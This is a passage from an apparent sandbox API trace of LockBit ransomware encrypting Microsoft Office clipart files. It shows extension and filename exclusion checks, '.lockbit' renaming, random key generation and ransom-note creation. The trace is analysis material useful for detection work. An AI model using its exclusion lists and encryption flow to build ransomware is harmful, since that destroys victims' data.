-1 [0109.955] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.955] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.956] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CRANE.WMF") returned 1 [0109.956] lstrcmpiW (lpString1="ntldr", lpString2="CRANE.WMF") returned 1 [0109.956] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CRANE.WMF") returned 1 [0109.956] lstrcmpiW (lpString1="bootsect.bak", lpString2="CRANE.WMF") returned -1 [0109.956] lstrcmpiW (lpString1="autorun.inf", lpString2="CRANE.WMF") returned -1 [0109.956] lstrcmpiW (lpString1="thumbs.db", lpString2="CRANE.WMF") returned 1 [0109.956] lstrcmpiW (lpString1="iconcache.db", lpString2="CRANE.WMF") returned 1 [0109.956] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.956] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned=".WMF" [0109.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.957] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.957] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.958] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.958] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.958] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.lockbit") returned 69 [0109.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.959] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.959] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.959] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5270) returned 1 [0109.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.961] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.966] malloc (_Size=0xa0) returned 0x2073f40 [0109.966] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0xa0, FileInformationClass=0xa) returned 0xc0000008 [0109.968] free (_Block=0x2073f40) [0109.968] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.968] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.968] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.968] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x60609cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0xc18a, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRANINST.WMF", cAlternateFileName="")) returned 1 [0109.968] lstrcmpiW (lpString1=".", lpString2="CRANINST.WMF") returned -1 [0109.968] lstrcmpiW (lpString1="..", lpString2="CRANINST.WMF") returned -1 [0109.968] PathFindExtensionW (pszPath="CRANINST.WMF") returned=".WMF" [0109.968] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.968] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.969] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.970] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.970] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CRANINST.WMF") returned 1 [0109.970] lstrcmpiW (lpString1="ntldr", lpString2="CRANINST.WMF") returned 1 [0109.970] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CRANINST.WMF") returned 1 [0109.970] lstrcmpiW (lpString1="bootsect.bak", lpString2="CRANINST.WMF") returned -1 [0109.970] lstrcmpiW (lpString1="autorun.inf", lpString2="CRANINST.WMF") returned -1 [0109.970] lstrcmpiW (lpString1="thumbs.db", lpString2="CRANINST.WMF") returned 1 [0109.970] lstrcmpiW (lpString1="iconcache.db", lpString2="CRANINST.WMF") returned 1 [0109.971] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.971] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned=".WMF" [0109.971] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.971] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.971] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.972] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.972] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.972] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.972] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.972] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.972] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.lockbit") returned 72 [0109.972] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.973] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.973] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.973] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=49546) returned 1 [0109.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.975] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.980] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.980] malloc (_Size=0xa6) returned 0x77d800 [0109.980] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.983] free (_Block=0x77d800) [0109.983] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.983] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.984] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51d354f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUP.WMF", cAlternateFileName="")) returned 1 [0109.984] lstrcmpiW (lpString1=".", lpString2="CUP.WMF") returned -1 [0109.984] lstrcmpiW (lpString1="..", lpString2="CUP.WMF") returned -1 [0109.984] PathFindExtensionW (pszPath="CUP.WMF") returned=".WMF" [0109.984] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.984] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.985] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.985] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CUP.WMF") returned 1 [0109.986] lstrcmpiW (lpString1="ntldr", lpString2="CUP.WMF") returned 1 [0109.986] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CUP.WMF") returned 1 [0109.986] lstrcmpiW (lpString1="bootsect.bak", lpString2="CUP.WMF") returned -1 [0109.986] lstrcmpiW (lpString1="autorun.inf", lpString2="CUP.WMF") returned -1 [0109.986] lstrcmpiW (lpString1="thumbs.db", lpString2="CUP.WMF") returned 1 [0109.986] lstrcmpiW (lpString1="iconcache.db", lpString2="CUP.WMF") returned 1 [0109.986] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.986] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned=".WMF" [0109.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.986] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.986] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.987] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.987] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.lockbit") returned 67 [0109.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.989] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.989] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.989] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2966) returned 1 [0109.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.990] 